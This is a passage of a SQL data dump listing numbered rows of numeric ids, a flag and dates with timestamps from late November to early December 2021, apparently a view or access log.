17:04:14'),(39118,1602,1,'2021-11-27','2021-11-27 17:18:37'),(39119,1870,1,'2021-11-27','2021-11-27 17:40:04'),(39120,3079,1,'2021-11-27','2021-11-27 17:49:08'),(39121,3079,1,'2021-11-27','2021-11-27 17:59:36'),(39122,1602,1,'2021-11-27','2021-11-27 18:09:56'),(39123,1586,1,'2021-11-27','2021-11-27 18:31:26'),(39124,1586,1,'2021-11-27','2021-11-27 18:41:14'),(39125,2159,1,'2021-11-27','2021-11-27 20:46:46'),(39126,4238,1,'2021-11-28','2021-11-28 01:08:50'),(39127,1870,1,'2021-11-28','2021-11-28 02:49:44'),(39128,1586,1,'2021-11-28','2021-11-28 02:55:43'),(39129,1711,1,'2021-11-28','2021-11-28 03:19:21'),(39130,4238,1,'2021-11-28','2021-11-28 03:30:45'),(39131,2813,1,'2021-11-28','2021-11-28 03:56:44'),(39132,68,1,'2021-11-28','2021-11-28 05:00:27'),(39133,2159,1,'2021-11-28','2021-11-28 05:46:54'),(39134,1726,1,'2021-11-28','2021-11-28 06:31:56'),(39135,1588,1,'2021-11-28','2021-11-28 06:32:16'),(39136,1582,1,'2021-11-28','2021-11-28 06:56:56'),(39137,3710,1,'2021-11-28','2021-11-28 07:55:45'),(39138,3781,1,'2021-11-28','2021-11-28 08:48:42'),(39139,2609,1,'2021-11-28','2021-11-28 08:54:53'),(39140,2609,1,'2021-11-28','2021-11-28 08:55:14'),(39141,2609,1,'2021-11-28','2021-11-28 08:55:52'),(39142,80,1,'2021-11-28','2021-11-28 09:48:25'),(39143,1703,1,'2021-11-28','2021-11-28 10:37:51'),(39144,1703,1,'2021-11-28','2021-11-28 10:38:12'),(39145,1703,1,'2021-11-28','2021-11-28 10:38:40'),(39146,1602,1,'2021-11-28','2021-11-28 11:17:35'),(39147,1586,1,'2021-11-28','2021-11-28 11:55:46'),(39148,2813,1,'2021-11-28','2021-11-28 13:27:21'),(39149,2159,1,'2021-11-28','2021-11-28 14:48:49'),(39150,1726,1,'2021-11-28','2021-11-28 15:33:48'),(39151,1596,1,'2021-11-28','2021-11-28 16:26:49'),(39152,1596,1,'2021-11-28','2021-11-28 18:02:09'),(39153,1602,1,'2021-11-28','2021-11-28 18:59:16'),(39154,1602,1,'2021-11-28','2021-11-28 19:39:54'),(39155,478,1,'2021-11-28','2021-11-28 19:53:12'),(39156,4400,1,'2021-11-28','2021-11-28 23:37:48'),(39157,4457,1,'2021-11-29','2021-11-29 00:27:29'),(39158,1870,1,'2021-11-29','2021-11-29 00:29:34'),(39159,2159,1,'2021-11-29','2021-11-29 00:31:50'),(39160,3664,1,'2021-11-29','2021-11-29 01:13:57'),(39161,1596,1,'2021-11-29','2021-11-29 01:14:11'),(39162,80,1,'2021-11-29','2021-11-29 01:33:22'),(39163,4457,1,'2021-11-29','2021-11-29 02:39:28'),(39164,4457,1,'2021-11-29','2021-11-29 02:40:11'),(39165,4457,1,'2021-11-29','2021-11-29 02:47:54'),(39166,470,1,'2021-11-29','2021-11-29 03:40:25'),(39167,89,1,'2021-11-29','2021-11-29 04:57:07'),(39168,4301,1,'2021-11-29','2021-11-29 06:00:15'),(39169,1598,1,'2021-11-29','2021-11-29 06:04:20'),(39170,1598,1,'2021-11-29','2021-11-29 06:04:36'),(39171,468,1,'2021-11-29','2021-11-29 06:31:32'),(39172,3764,1,'2021-11-29','2021-11-29 07:46:36'),(39173,3531,1,'2021-11-29','2021-11-29 08:12:38'),(39174,1747,1,'2021-11-29','2021-11-29 08:15:57'),(39175,468,1,'2021-11-29','2021-11-29 09:28:50'),(39176,2159,1,'2021-11-29','2021-11-29 09:37:53'),(39177,3245,1,'2021-11-29','2021-11-29 10:04:16'),(39178,4396,1,'2021-11-29','2021-11-29 10:24:06'),(39179,2150,1,'2021-11-29','2021-11-29 10:28:27'),(39180,1594,1,'2021-11-29','2021-11-29 11:56:55'),(39181,2309,1,'2021-11-29','2021-11-29 13:46:44'),(39182,1588,1,'2021-11-29','2021-11-29 13:49:54'),(39183,2410,1,'2021-11-29','2021-11-29 13:57:55'),(39184,3764,1,'2021-11-29','2021-11-29 14:07:28'),(39185,3245,1,'2021-11-29','2021-11-29 14:12:52'),(39186,2309,1,'2021-11-29','2021-11-29 14:35:53'),(39187,1614,1,'2021-11-29','2021-11-29 14:42:52'),(39188,1544,1,'2021-11-29','2021-11-29 16:17:29'),(39189,80,1,'2021-11-29','2021-11-29 16:18:10'),(39190,80,1,'2021-11-29','2021-11-29 16:25:48'),(39191,80,1,'2021-11-29','2021-11-29 16:25:54'),(39192,1600,1,'2021-11-29','2021-11-29 16:54:16'),(39193,1600,1,'2021-11-29','2021-11-29 17:31:51'),(39194,1602,1,'2021-11-29','2021-11-29 17:32:24'),(39195,3226,1,'2021-11-29','2021-11-29 17:46:34'),(39196,3226,1,'2021-11-29','2021-11-29 18:04:42'),(39197,3764,1,'2021-11-29','2021-11-29 18:10:07'),(39198,2457,1,'2021-11-29','2021-11-29 18:21:14'),(39199,570,1,'2021-11-29','2021-11-29 18:30:44'),(39200,1718,1,'2021-11-29','2021-11-29 18:42:07'),(39201,2159,1,'2021-11-29','2021-11-29 18:47:15'),(39202,1602,1,'2021-11-29','2021-11-29 18:53:41'),(39203,1602,1,'2021-11-29','2021-11-29 18:53:42'),(39204,1602,1,'2021-11-29','2021-11-29 18:54:45'),(39205,1602,1,'2021-11-29','2021-11-29 18:55:58'),(39206,80,1,'2021-11-29','2021-11-29 18:56:44'),(39207,1770,1,'2021-11-29','2021-11-29 19:05:18'),(39208,2704,1,'2021-11-29','2021-11-29 20:02:07'),(39209,1602,1,'2021-11-29','2021-11-29 20:38:13'),(39210,1602,1,'2021-11-29','2021-11-29 21:18:49'),(39211,4335,1,'2021-11-29','2021-11-29 21:57:12'),(39212,1600,1,'2021-11-29','2021-11-29 22:27:38'),(39213,1600,1,'2021-11-29','2021-11-29 22:29:14'),(39214,1594,1,'2021-11-29','2021-11-29 22:44:40'),(39215,2989,1,'2021-11-29','2021-11-29 22:55:09'),(39216,2410,1,'2021-11-29','2021-11-29 23:01:34'),(39217,3777,1,'2021-11-29','2021-11-29 23:29:05'),(39218,3781,1,'2021-11-29','2021-11-29 23:35:11'),(39219,1602,1,'2021-11-30','2021-11-30 00:25:33'),(39220,1602,1,'2021-11-30','2021-11-30 00:25:36'),(39221,3290,1,'2021-11-30','2021-11-30 01:42:10'),(39222,3226,1,'2021-11-30','2021-11-30 03:15:13'),(39223,1877,1,'2021-11-30','2021-11-30 03:59:04'),(39224,2309,1,'2021-11-30','2021-11-30 03:59:37'),(39225,1602,1,'2021-11-30','2021-11-30 04:30:49'),(39226,1600,1,'2021-11-30','2021-11-30 04:32:26'),(39227,1604,1,'2021-11-30','2021-11-30 04:44:37'),(39228,1602,1,'2021-11-30','2021-11-30 05:27:01'),(39229,1606,1,'2021-11-30','2021-11-30 07:02:15'),(39230,1594,1,'2021-11-30','2021-11-30 07:14:47'),(39231,3307,1,'2021-11-30','2021-11-30 07:49:06'),(39232,1602,1,'2021-11-30','2021-11-30 07:54:31'),(39233,1602,1,'2021-11-30','2021-11-30 07:54:36'),(39234,2410,1,'2021-11-30','2021-11-30 07:54:40'),(39235,1582,1,'2021-11-30','2021-11-30 07:56:40'),(39236,2309,1,'2021-11-30','2021-11-30 08:09:06'),(39237,2989,1,'2021-11-30','2021-11-30 08:09:39'),(39238,2989,1,'2021-11-30','2021-11-30 08:10:53'),(39239,3307,1,'2021-11-30','2021-11-30 08:32:21'),(39240,1588,1,'2021-11-30','2021-11-30 09:13:43'),(39241,3764,1,'2021-11-30','2021-11-30 09:14:38'),(39242,3240,1,'2021-11-30','2021-11-30 10:48:56'),(39243,2309,1,'2021-11-30','2021-11-30 12:20:15'),(39244,91,1,'2021-11-30','2021-11-30 12:28:40'),(39245,1604,1,'2021-11-30','2021-11-30 13:33:50'),(39246,80,1,'2021-11-30','2021-11-30 13:39:21'),(39247,3430,1,'2021-11-30','2021-11-30 13:55:07'),(39248,3282,1,'2021-11-30','2021-11-30 14:09:04'),(39249,2704,1,'2021-11-30','2021-11-30 14:23:39'),(39250,1774,1,'2021-11-30','2021-11-30 14:53:37'),(39251,1774,1,'2021-11-30','2021-11-30 14:55:56'),(39252,1774,1,'2021-11-30','2021-11-30 14:56:29'),(39253,1602,1,'2021-11-30','2021-11-30 15:30:04'),(39254,1602,1,'2021-11-30','2021-11-30 15:35:50'),(39255,2309,1,'2021-11-30','2021-11-30 16:24:17'),(39256,2148,1,'2021-11-30','2021-11-30 17:27:32'),(39257,3034,1,'2021-11-30','2021-11-30 17:41:55'),(39258,3034,1,'2021-11-30','2021-11-30 18:11:22'),(39259,80,1,'2021-11-30','2021-11-30 18:22:16'),(39260,68,1,'2021-11-30','2021-11-30 18:22:20'),(39261,108,1,'2021-11-30','2021-11-30 18:22:24'),(39262,2410,1,'2021-11-30','2021-11-30 18:25:57'),(39263,1606,1,'2021-11-30','2021-11-30 19:09:20'),(39264,1718,1,'2021-11-30','2021-11-30 19:45:38'),(39265,1718,1,'2021-11-30','2021-11-30 19:45:59'),(39266,1718,1,'2021-11-30','2021-11-30 19:46:15'),(39267,1718,1,'2021-11-30','2021-11-30 19:58:46'),(39268,1600,1,'2021-11-30','2021-11-30 20:15:22'),(39269,1594,1,'2021-11-30','2021-11-30 21:07:59'),(39270,3267,1,'2021-11-30','2021-11-30 21:31:52'),(39271,1713,1,'2021-11-30','2021-11-30 22:15:20'),(39272,4341,1,'2021-12-01','2021-12-01 04:00:25'),(39273,2309,1,'2021-12-01','2021-12-01 04:07:34'),(39274,4341,1,'2021-12-01','2021-12-01 04:09:02'),(39275,2159,1,'2021-12-01','2021-12-01 06:14:57'),(39276,2159,1,'2021-12-01','2021-12-01 06:14:58'),(39277,1602,1,'2021-12-01','2021-12-01 06:55:54'),(39278,2159,1,'2021-12-01','2021-12-01 08:18:22'),(39279,2309,1,'2021-12-01','2021-12-01 08:21:27'),(39280,4323,1,'2021-12-01','2021-12-01 09:37:39'),(39281,1594,1,'2021-12-01','2021-12-01 09:57:19'),(39282,4238,1,'2021-12-01','2021-12-01 09:59:39'),(39283,2609,1,'2021-12-01','2021-12-01 10:12:03'),(39284,84,1,'2021-12-01','2021-12-01 10:15:48'),(39285,1872,1,'2021-12-01','2021-12-01 10:16:36'),(39286,84,1,'2021-12-01','2021-12-01 10:19:07'),(39287,2609,1,'2021-12-01','2021-12-01 10:19:18'),(39288,487,1,'2021-12-01','2021-12-01 10:19:59'),(39289,1586,1,'2021-12-01','2021-12-01 10:22:54'),(39290,2159,1,'2021-12-01','2021-12-01 10:58:16'),(39291,2159,1,'2021-12-01','2021-12-01 10:58:17'),(39292,2309,1,'2021-12-01','2021-12-01 10:59:02'),(39293,2309,1,'2021-12-01','2021-12-01 10:59:14'),(39294,2159,1,'2021-12-01','2021-12-01 10:59:47'),(39295,4420,1,'2021-12-01','2021-12-01 11:43:34'),(39296,2309,1,'2021-12-01','2021-12-01 11:44:13'),(39297,2503,1,'2021-12-01','2021-12-01 11:45:35'),(39298,470,1,'2021-12-01','2021-12-01 11:48:23'),(39299,467,1,'2021-12-01','2021-12-01 12:03:44'),(39300,3764,1,'2021-12-01','2021-12-01 12:46:00'),(39301,2309,1,'2021-12-01','2021-12-01 12:55:51'),(39302,1588,1,'2021-12-01','2021-12-01 14:20:05'),(39303,1713,1,'2021-12-01','2021-12-01 15:21:13'),(39304,2309,1,'2021-12-01','2021-12-01 16:07:27'),(39305,2309,1,'2021-12-01','2021-12-01 16:08:57'),(39306,2165,1,'2021-12-01','2021-12-01 16:19:49'),(39307,4457,1,'2021-12-01','2021-12-01 16:43:42'),(39308,1602,1,'2021-12-01','2021-12-01 17:24:57'),(39309,3781,1,'2021-12-01','2021-12-01 17:56:55'),(39310,2617,1,'2021-12-01','2021-12-01 20:03:41'),(39311,3261,1,'2021-12-01','2021-12-01 23:32:59'),(39312,3109,1,'2021-12-02','2021-12-02 01:21:34'),(39313,1608,1,'2021-12-02','2021-12-02 01:42:01'),(39314,3482,1,'2021-12-02','2021-12-02 02:41:59'),(39315,3752,1,'2021-12-02','2021-12-02 02:42:22'),(39316,3752,1,'2021-12-02','2021-12-02 02:42:53'),(39317,1614,1,'2021-12-02','2021-12-02 03:44:01'),(39318,1544,1,'2021-12-02','2021-12-02 04:17:10'),(39319,2309,1,'2021-12-02','2021-12-02 06:56:48'),(39320,3698,1,'2021-12-02','2021-12-02 08:12:15'),(39321,3698,1,'2021-12-02','2021-12-02 08:12:37'),(39322,3290,1,'2021-12-02','2021-12-02 09:08:37'),(39323,2063,1,'2021-12-02','2021-12-02 09:23:36'),(39324,1695,1,'2021-12-02','2021-12-02 09:36:55'),(39325,2410,1,'2021-12-02','2021-12-02 09:38:37'),(39326,1602,1,'2021-12-02','2021-12-02 09:56:58'),(39327,4238,1,'2021-12-02','2021-12-02 10:04:31'),(39328,1602,1,'2021-12-02','2021-12-02 10:08:39'),(39329,1612,1,'2021-12-02','2021-12-02 10:12:55'),(39330,1544,1,'2021-12-02','2021-12-02 10:24:13'),(39331,468,1,'2021-12-02','2021-12-02 10:40:14'),(39332,1594,1,'2021-12-02','2021-12-02 10:51:18'),(39333,1600,1,'2021-12-02','2021-12-02 11:08:45'),(39334,477,1,'2021-12-02','2021-12-02 11:43:52'),(39335,4457,1,'2021-12-02','2021-12-02 12:28:27'),(39336,335,1,'2021-12-02','2021-12-02 12:31:05'),(39337,487,1,'2021-12-02','2021-12-02 13:47:38'),(39338,2704,1,'2021-12-02','2021-12-02 13:58:26'),(39339,2704,1,'2021-12-02','2021-12-02 14:28:34'),(39340,72,1,'2021-12-02','2021-12-02 14:38:53'),(39341,4496,1,'2021-12-02','2021-12-02 14:41:41'),(39342,72,1,'2021-12-02','2021-12-02 14:58:12'),(39343,4494,1,'2021-12-02','2021-12-02 14:59:33'),(39344,72,1,'2021-12-02','2021-12-02 15:00:06'),(39345,4492,1,'2021-12-02','2021-12-02 15:00:29'),(39346,72,1,'2021-12-02','2021-12-02 15:01:17'),(39347,4485,1,'2021-12-02','2021-12-02 15:02:30'),(39348,72,1,'2021-12-02','2021-12-02 15:04:08'),(39349,1612,1,'2021-12-02','2021-12-02 15:30:13'),(39350,1592,1,'2021-12-02','2021-12-02 15:34:44'),(39351,2309,1,'2021-12-02','2021-12-02 15:36:40'),(39352,4238,1,'2021-12-02','2021-12-02 15:37:20'),(39353,4400,1,'2021-12-02','2021-12-02 15:38:34'),(39354,4454,1,'2021-12-02','2021-12-02 15:39:41'),(39355,4400,1,'2021-12-02','2021-12-02 15:42:28'),(39356,4238,1,'2021-12-02','2021-12-02 15:43:24'),(39357,80,1,'2021-12-02','2021-12-02 15:44:58'),(39358,4492,1,'2021-12-02','2021-12-02 15:45:35'),(39359,4492,1,'2021-12-02','2021-12-02 15:48:10'),(39360,4492,1,'2021-12-02','2021-12-02 15:49:28'),(39361,4492,1,'2021-12-02','2021-12-02 15:49:40'),(39362,4492,1,'2021-12-02','2021-12-02 15:49:51'),(39363,4492,1,'2021-12-02','2021-12-02 15:50:22'),(39364,4492,1,'2021-12-02','2021-12-02 15:52:20'),(39365,72,1,'2021-12-02','2021-12-02 15:52:31'),(39366,4492,1,'2021-12-02','2021-12-02 15:58:24'),(39367,4492,1,'2021-12-02','2021-12-02 16:00:49'),(39368,72,1,'2021-12-02','2021-12-02 16:01:26'),(39369,4492,1,'2021-12-02','2021-12-02 16:02:27'),(39370,74,1,'2021-12-02','2021-12-02 16:03:35'),(39371,72,1,'2021-12-02','2021-12-02 16:04:04'),(39372,1582,1,'2021-12-02','2021-12-02 16:04:09'),(39373,4496,1,'2021-12-02','2021-12-02 16:10:59'),(39374,4492,1,'2021-12-02','2021-12-02 16:12:22'),(39375,4492,1,'2021-12-02','2021-12-02 16:12:44'),(39376,72,1,'2021-12-02','2021-12-02 16:20:29'),(39377,4492,1,'2021-12-02','2021-12-02 16:23:46'),(39378,4492,1,'2021-12-02','2021-12-02 16:30:46'),(39379,4496,1,'2021-12-02','2021-12-02 16:31:52'),(39380,72,1,'2021-12-02','2021-12-02 16:37:30'),(39381,4494,1,'2021-12-02','2021-12-02 16:37:50'),(39382,4492,1,'2021-12-02','2021-12-02 16:38:45'),(39383,2165,1,'2021-12-02','2021-12-02 16:38:45'),(39384,72,1,'2021-12-02','2021-12-02 16:38:49'),(39385,72,1,'2021-12-02','2021-12-02 16:45:09'),(39386,72,1,'2021-12-02','2021-12-02 16:49:11'),(39387,4492,1,'2021-12-02','2021-12-02 16:58:45'),(39388,4492,1,'2021-12-02','2021-12-02 17:01:38'),(39389,4496,1,'2021-12-02','2021-12-02 17:04:28'),(39390,1544,1,'2021-12-02','2021-12-02 17:07:31'),(39391,4496,1,'2021-12-02','2021-12-02 17:07:53'),(39392,2503,1,'2021-12-02','2021-12-02 17:41:02'),(39393,2911,1,'2021-12-02','2021-12-02 17:46:54'),(39394,4494,1,'2021-12-02','2021-12-02 17:47:56'),(39395,4492,1,'2021-12-02','2021-12-02 17:55:44'),(39396,4492,1,'2021-12-02','2021-12-02 17:58:29'),(39397,4496,1,'2021-12-02','2021-12-02 18:45:02'),(39398,1602,1,'2021-12-02','2021-12-02 18:48:42'),(39399,2154,1,'2021-12-02','2021-12-02 18:48:52'),(39400,4492,1,'2021-12-02','2021-12-02 19:25:52'),(39401,468,1,'2021-12-02','2021-12-02 19:35:07'),(39402,1774,1,'2021-12-02','2021-12-02 19:42:36'),(39403,1614,1,'2021-12-02','2021-12-02 19:56:39'),(39404,4492,1,'2021-12-02','2021-12-02 20:00:15'),(39405,4496,1,'2021-12-02','2021-12-02 20:14:52'),(39406,4494,1,'2021-12-02','2021-12-02 20:17:19'),(39407,4492,1,'2021-12-02','2021-12-02 20:17:51'),(39408,4496,1,'2021-12-02','2021-12-02 20:23:33'),(39409,4494,1,'2021-12-02','2021-12-02 20:24:40'),(39410,4492,1,'2021-12-02','2021-12-02 20:25:28'),(39411,4496,1,'2021-12-02','2021-12-02 20:26:05'),(39412,2159,1,'2021-12-02','2021-12-02 20:28:55'),(39413,2159,1,'2021-12-02','2021-12-02 20:29:16'),(39414,2159,1,'2021-12-02','2021-12-02 20:30:29'),(39415,2309,1,'2021-12-02','2021-12-02 20:35:23'),(39416,2309,1,'2021-12-02','2021-12-02 20:35:26'),(39417,2309,1,'2021-12-02','2021-12-02 20:36:27'),(39418,2309,1,'2021-12-02','2021-12-02 20:36:28'),(39419,1600,1,'2021-12-02','2021-12-02 20:47:40'),(39420,1602,1,'2021-12-02','2021-12-02 21:05:27'),(39421,4492,1,'2021-12-02','2021-12-02 21:09:44'),(39422,4492,1,'2021-12-02','2021-12-02 21:16:21'),(39423,4494,1,'2021-12-02','2021-12-02 21:16:43'),(39424,72,1,'2021-12-02','2021-12-02 21:16:48'),(39425,1602,1,'2021-12-02','2021-12-02 21:29:56'),(39426,4496,1,'2021-12-02','2021-12-02 21:45:41'),(39427,72,1,'2021-12-02','2021-12-02 21:48:06'),(39428,1612,1,'2021-12-02','2021-12-02 21:49:04'),(39429,68,1,'2021-12-02','2021-12-02 22:12:39'),(39430,4492,1,'2021-12-02','2021-12-02 22:38:13'),(39431,4492,1,'2021-12-02','2021-12-02 22:44:21'),(39432,4492,1,'2021-12-02','2021-12-02 22:50:10'),(39433,4492,1,'2021-12-02','2021-12-02 22:50:24'),(39434,4396,1,'2021-12-02','2021-12-02 22:54:56'),(39435,1598,1,'2021-12-03','2021-12-03 01:32:26'),(39436,1598,1,'2021-12-03','2021-12-03 01:32:26'),(39437,1598,1,'2021-12-03','2021-12-03 01:32:29'),(39438,1699,1,'2021-12-03','2021-12-03 02:05:50'),(39439,570,1,'2021-12-03','2021-12-03 02:56:54'),(39440,570,1,'2021-12-03','2021-12-03 02:59:03'),(39441,1594,1,'2021-12-03','2021-12-03 03:06:23'),(39442,570,1,'2021-12-03','2021-12-03 03:10:26'),(39443,570,1,'2021-12-03','2021-12-03 03:10:44'),(39444,72,1,'2021-12-03','2021-12-03 03:31:27'),(39445,4492,1,'2021-12-03','2021-12-03 03:31:33'),(39446,72,1,'2021-12-03','2021-12-03 03:31:43'),(39447,3102,1,'2021-12-03','2021-12-03 03:39:27'),(39448,478,1,'2021-12-03','2021-12-03 03:43:02'),(39449,76,1,'2021-12-03','2021-12-03 03:49:37'),(39450,2410,1,'2021-12-03','2021-12-03 06:41:42'),(39451,4400,1,'2021-12-03','2021-12-03 06:54:29'),(39452,1724,1,'2021-12-03','2021-12-03 06:54:49'),(39453,2813,1,'2021-12-03','2021-12-03 06:57:17'),(39454,1598,1,'2021-12-03','2021-12-03 07:28:00'),(39455,1598,1,'2021-12-03','2021-12-03 07:33:07'),(39456,1544,1,'2021-12-03','2021-12-03 08:02:31'),(39457,1544,1,'2021-12-03','2021-12-03 08:04:06'),(39458,1600,1,'2021-12-03','2021-12-03 08:10:58'),(39459,4436,1,'2021-12-03','2021-12-03 08:32:54'),(39460,4492,1,'2021-12-03','2021-12-03 08:53:31'),(39461,74,1,'2021-12-03','2021-12-03 09:00:18'),(39462,2503,1,'2021-12-03','2021-12-03 09:01:32'),(39463,4492,1,'2021-12-03','2021-12-03 09:23:55'),(39464,2309,1,'2021-12-03','2021-12-03 09:59:24'),(39465,2309,1,'2021-12-03','2021-12-03 10:00:55'),(39466,1718,1,'2021-12-03','2021-12-03 10:16:10'),(39467,1612,1,'2021-12-03','2021-12-03 10:19:44'),(39468,471,1,'2021-12-03','2021-12-03 10:20:05'),(39469,4492,1,'2021-12-03','2021-12-03 10:26:56'),(39470,4492,1,'2021-12-03','2021-12-03 10:27:55'),(39471,4496,1,'2021-12-03','2021-12-03 11:02:53'),(39472,4492,1,'2021-12-03','2021-12-03 11:17:59'),(39473,3096,1,'2021-12-03','2021-12-03 11:29:54'),(39474,1586,1,'2021-12-03','2021-12-03 11:29:57'),(39475,1877,1,'2021-12-03','2021-12-03 11:30:45'),(39476,484,1,'2021-12-03','2021-12-03 11:40:19'),(39477,4492,1,'2021-12-03','2021-12-03 11:42:57'),(39478,1612,1,'2021-12-03','2021-12-03 11:44:43'),(39479,476,1,'2021-12-03','2021-12-03 12:12:02'),(39480,4238,1,'2021-12-03','2021-12-03 12:54:15'),(39481,4238,1,'2021-12-03','2021-12-03 13:24:26'),(39482,3290,1,'2021-12-03','2021-12-03 13:45:43'),(39483,1602,1,'2021-12-03','2021-12-03 13:47:18'),(39484,4492,1,'2021-12-03','2021-12-03 14:05:18'),(39485,80,1,'2021-12-03','2021-12-03 14:15:21'),(39486,2813,1,'2021-12-03','2021-12-03 14:57:26'),(39487,2813,1,'2021-12-03','2021-12-03 14:57:38'),(39488,2309,1,'2021-12-03','2021-12-03 15:21:23'),(39489,2309,1,'2021-12-03','2021-12-03 15:40:02'),(39490,2989,1,'2021-12-03','2021-12-03 15:56:44'),(39491,4492,1,'2021-12-03','2021-12-03 16:54:45'),(39492,4492,1,'2021-12-03','2021-12-03 17:04:00'),(39493,2971,1,'2021-12-03','2021-12-03 17:54:44'),(39494,1612,1,'2021-12-03','2021-12-03 18:28:37'),(39495,1612,1,'2021-12-03','2021-12-03 18:40:09'),(39496,1608,1,'2021-12-03','2021-12-03 19:02:37'),(39497,470,1,'2021-12-03','2021-12-03 19:04:24'),(39498,1877,1,'2021-12-03','2021-12-03 19:26:41'),(39499,1770,1,'2021-12-03','2021-12-03 21:20:43'),(39500,3069,1,'2021-12-03','2021-12-03 21:44:46'),(39501,3764,1,'2021-12-04','2021-12-04 00:43:05'),(39502,2911,1,'2021-12-04','2021-12-04 01:37:49'),(39503,2309,1,'2021-12-04','2021-12-04 01:51:39'),(39504,2609,1,'2021-12-04','2021-12-04 02:03:54'),(39505,2410,1,'2021-12-04','2021-12-04 02:05:33'),(39506,2609,1,'2021-12-04','2021-12-04 02:31:18'),(39507,2609,1,'2021-12-04','2021-12-04 02:31:35'),(39508,2609,1,'2021-12-04','2021-12-04 02:32:01'),(39509,2609,1,'2021-12-04','2021-12-04 02:32:18'),(39510,2609,1,'2021-12-04','2021-12-04 02:32:55'),(39511,1877,1,'2021-12-04','2021-12-04 02:33:18'),(39512,2609,1,'2021-12-04','2021-12-04 03:49:43'),(39513,2813,1,'2021-12-04','2021-12-04 03:50:49'),(39514,2989,1,'2021-12-04','2021-12-04 04:05:47'),(39515,3781,1,'2021-12-04','2021-12-04 05:31:04'),(39516,3498,1,'2021-12-04','2021-12-04 05:44:57'),(39517,1598,1,'2021-12-04','2021-12-04 06:18:35'),(39518,472,1,'2021-12-04','2021-12-04 07:21:44'),(39519,1606,1,'2021-12-04','2021-12-04 07:42:45'),(39520,4301,1,'2021-12-04','2021-12-04 08:00:54'),(39521,1614,1,'2021-12-04','2021-12-04 09:19:10'),(39522,80,1,'2021-12-04','2021-12-04 09:19:29'),(39523,1614,1,'2021-12-04','2021-12-04 09:19:39'),(39524,1614,1,'2021-12-04','2021-12-04 09:25:05'),(39525,3438,1,'2021-12-04','2021-12-04 10:05:55'),(39526,2410,1,'2021-12-04','2021-12-04 10:34:53'),(39527,2309,1,'2021-12-04','2021-12-04 10:43:53'),(39528,2911,1,'2021-12-04','2021-12-04 10:57:00'),(39529,1608,1,'2021-12-04','2021-12-04 11:17:32'),(39530,80,1,'2021-12-04','2021-12-04 11:17:56'),(39531,1602,1,'2021-12-04','2021-12-04 11:18:05'),(39532,80,1,'2021-12-04','2021-12-04 11:18:27'),(39533,1602,1,'2021-12-04','2021-12-04 11:18:39'),(39534,1608,1,'2021-12-04','2021-12-04 11:30:28'),(39535,472,1,'2021-12-04','2021-12-04 11:33:00'),(39536,2704,1,'2021-12-04','2021-12-04 11:52:02'),(39537,3282,1,'2021-12-04','2021-12-04 13:26:37'),(39538,2775,1,'2021-12-04','2021-12-04 13:41:07'),(39539,76,1,'2021-12-04','2021-12-04 13:49:57'),(39540,1602,1,'2021-12-04','2021-12-04 14:33:03'),(39541,1600,1,'2021-12-04','2021-12-04 14:56:42'),(39542,1600,1,'2021-12-04','2021-12-04 14:56:58'),(39543,3764,1,'2021-12-04','2021-12-04 15:18:03'),(39544,2775,1,'2021-12-04','2021-12-04 15:47:58'),(39545,2297,1,'2021-12-04','2021-12-04 17:43:32'),(39546,3030,1,'2021-12-04','2021-12-04 17:44:26'),(39547,3290,1,'2021-12-04','2021-12-04 17:47:49'),(39548,2911,1,'2021-12-04','2021-12-04 18:11:06'),(39549,3030,1,'2021-12-04','2021-12-04 18:20:56'),(39550,4457,1,'2021-12-04','2021-12-04 18:34:46'),(39551,1722,1,'2021-12-04','2021-12-04 18:56:26'),(39552,4400,1,'2021-12-04','2021-12-04 19:14:47'),(39553,570,1,'2021-12-04','2021-12-04 19:38:32'),(39554,4400,1,'2021-12-04','2021-12-04 19:50:16'),(39555,1612,1,'2021-12-04','2021-12-04 20:01:37'),(39556,1582,1,'2021-12-04','2021-12-04 20:26:06'),(39557,477,1,'2021-12-04','2021-12-04 20:30:36'),(39558,1872,1,'2021-12-04','2021-12-04 20:56:04'),(39559,1582,1,'2021-12-04','2021-12-04 21:32:06'),(39560,2904,1,'2021-12-04','2021-12-04 22:57:15'),(39561,2457,1,'2021-12-04','2021-12-04 23:04:57'),(39562,467,1,'2021-12-04','2021-12-04 23:25:51'),(39563,1586,1,'2021-12-05','2021-12-05 00:04:39'),(39564,1602,1,'2021-12-05','2021-12-05 02:12:12'),(39565,3664,1,'2021-12-05','2021-12-05 02:31:10'),(39566,3030,1,'2021-12-05','2021-12-05 02:44:49'),(39567,570,1,'2021-12-05','2021-12-05 04:49:39'),(39568,3102,1,'2021-12-05','2021-12-05 05:22:20'),(39569,472,1,'2021-12-05','2021-12-05 06:27:15'),(39570,2165,1,'2021-12-05','2021-12-05 06:35:06'),(39571,3285,1,'2021-12-05','2021-12-05 07:27:34'),(39572,2309,1,'2021-12-05','2021-12-05 07:37:12'),(39573,3430,1,'2021-12-05','2021-12-05 08:09:20'),(39574,2775,1,'2021-12-05','2021-12-05 08:41:59'),(39575,4492,1,'2021-12-05','2021-12-05 09:03:19'),(39576,4492,1,'2021-12-05','2021-12-05 09:05:02'),(39577,3498,1,'2021-12-05','2021-12-05 09:16:01'),(39578,1602,1,'2021-12-05','2021-12-05 09:19:33'),(39579,1594,1,'2021-12-05','2021-12-05 09:46:58'),(39580,472,1,'2021-12-05','2021-12-05 10:27:24'),(39581,68,1,'2021-12-05','2021-12-05 10:46:57'),(39582,2457,1,'2021-12-05','2021-12-05 10:55:00'),(39583,2309,1,'2021-12-05','2021-12-05 11:18:49'),(39584,3226,1,'2021-12-05','2021-12-05 13:18:38'),(39585,3226,1,'2021-12-05','2021-12-05 13:45:48'),(39586,1544,1,'2021-12-05','2021-12-05 13:49:43'),(39587,2309,1,'2021-12-05','2021-12-05 15:00:09'),(39588,1600,1,'2021-12-05','2021-12-05 16:59:10'),(39589,3247,1,'2021-12-05','2021-12-05 17:17:47'),(39590,3486,1,'2021-12-05','2021-12-05 17:29:48'),(39591,1596,1,'2021-12-05','2021-12-05 18:20:32'),(39592,68,1,'2021-12-05','2021-12-05 19:36:33'),(39593,2704,1,'2021-12-05','2021-12-05 19:40:36'),(39594,2704,1,'2021-12-05','2021-12-05 19:43:36'),(39595,472,1,'2021-12-05','2021-12-05 20:00:32'),(39596,3097,1,'2021-12-05','2021-12-05 20:47:48'),(39597,2769,1,'2021-12-05','2021-12-05 20:51:33'),(39598,2309,1,'2021-12-05','2021-12-05 21:05:41'),(39599,2309,1,'2021-12-05','2021-12-05 21:06:03'),(39600,2457,1,'2021-12-05','2021-12-05 21:23:16'),(39601,1612,1,'2021-12-05','2021-12-05 21:40:18'),(39602,74,1,'2021-12-05','2021-12-05 21:40:44'),(39603,1612,1,'2021-12-05','2021-12-05 